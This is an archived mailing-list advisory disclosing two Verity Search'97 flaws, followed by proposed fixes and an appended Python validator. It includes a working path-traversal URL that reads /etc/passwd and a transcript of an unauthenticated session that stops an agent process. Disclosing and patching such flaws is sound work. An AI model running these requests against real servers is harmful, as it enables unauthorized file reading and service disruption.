I've mentioned this a couple of weeks back to Verity tech support, but unfortunately nothing has happened since.

++ Intro

There are two major security holes in the Verity/Search'97 software. The first one is a simple CGI hack that allows anybody with permission to execute the s97_cgi CGI script to read files on the web server. The second is an authorization problem with the tasmgr application.

++ CGI Scripts

The s97_cgi and s97r_cgi programs provide an interface for web-based applications to the Verity search engine. These two programs typically handle search queries and display the results of those queries. One of the parameters to the script specifies the name of a template file that is used to show the result of the search query. This path is relative to a directory that you have to specify in the Verity configuration files.

The problem is that this template pathname is appended to the base directory name without proper checking of the path for .. or %2e%2e. This means that it is possible to jump out of the templates directory and use any file on the Verity host as a result template. It will be sent back to the client browser in its original form, or with minor modifications if it contained any valid HTMLscript tags (Verity's script language).

Sample query:

  http://www.xxx.com/search97.vts
    ?HLNavigate=On&querytext=dcm
    &ServerKey=Primary
    &ResultTemplate=../../../../../../../etc/passwd
    &ResultStyle=simple
    &ResultCount=20
    &collection=books

Please note that only files can be read for which the owner of the web server process has permission.

++ Tasmgr

The tasmgr process, part of the Agent Server, listens on port 1972 for administrative commands. Unfortunately this requires no authorization at all, so anybody can start and stop your agent processes.

  Connected to search97.xxx
  Escape character is '^]'.
  0 Verity dcm ready
  list
  0 TAS-Primary
  status tas-primary
  0 TYPE=PROCESS; STATE=RUNNING; STARTUP=AUTO_START; PID=87632
  stop tas-primary
  0 'tas-primary' signalled
  status tas-primary
  0 TYPE=PROCESS; STATE=STOPPING; STARTUP=AUTO_START; PID=87632
  where
  0 /home/verity/_hpux10/bin/dcm.cfg

None of this is mentioned in the manuals or online FAQs.

++ Possible solutions

For the CGI bug, use a wrapper around the Verity CGIs that checks for .. in the argument part. This can probably also be done with Apache's mod_rewrite. Another solution is to call the Verity CGIs directly from your own CGI scripts. This is my preferred way.

The TASMGR problem can simply be blocked with a firewall or router ACL.

Greetings,

 Stefan

--
Stefan Arentz stefan.arentzat_private / http://www.soze.com/stefan
Our future is so bright we've got to wear dark shades !
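One way to implement the wrapper check suggested above, as an added example that is not part of the original post or of Verity's software: a Python front end that percent-decodes the ResultTemplate parameter (catching %2e%2e and double-encoded forms), rejects absolute paths and any .. segment, and confirms that the resolved path still lies under the templates directory. The templates directory /srv/verity/templates and the function names are assumptions.

```python
import os
from urllib.parse import parse_qs, unquote

def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so a double-encoded
    %252e%252e is caught as well as the %2e%2e the post mentions."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def resolve_template(base_dir, result_template):
    """Return the absolute template path if it lies inside base_dir, else None.
    Verity treats ResultTemplate as relative to its templates directory, so
    an empty value, an absolute path, a NUL byte or any '..' segment is
    rejected before the path is even joined."""
    decoded = decode_fully(result_template)
    if not decoded or "\x00" in decoded or decoded.startswith(("/", "\\")):
        return None
    if any(seg == ".." for seg in decoded.replace("\\", "/").split("/")):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # realpath follows symlinks, so a link inside templates/ that points
    # elsewhere on the host is caught here rather than served.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def validate_request(base_dir, query_string):
    """Apply resolve_template() to the ResultTemplate field of a raw CGI
    query string (the other search97.vts fields are passed through untouched).
    Returns the vetted template path, or None when the request must be refused."""
    params = parse_qs(query_string)
    templates = params.get("ResultTemplate")
    if not templates or len(templates) != 1:
        return None
    return resolve_template(base_dir, templates[0])

if __name__ == "__main__":
    # Constructed sample: the traversal from the post beside a legitimate request.
    base = "/srv/verity/templates"  # assumed templates directory
    bad = ("HLNavigate=On&querytext=dcm&ServerKey=Primary"
           "&ResultTemplate=../../../../../../../etc/passwd&ResultStyle=simple")
    good = "querytext=dcm&ResultTemplate=books/simple.hts&ResultStyle=simple"
    print("traversal ->", validate_request(base, bad))   # None
    print("legit     ->", validate_request(base, good))
```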
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:04:25 PDT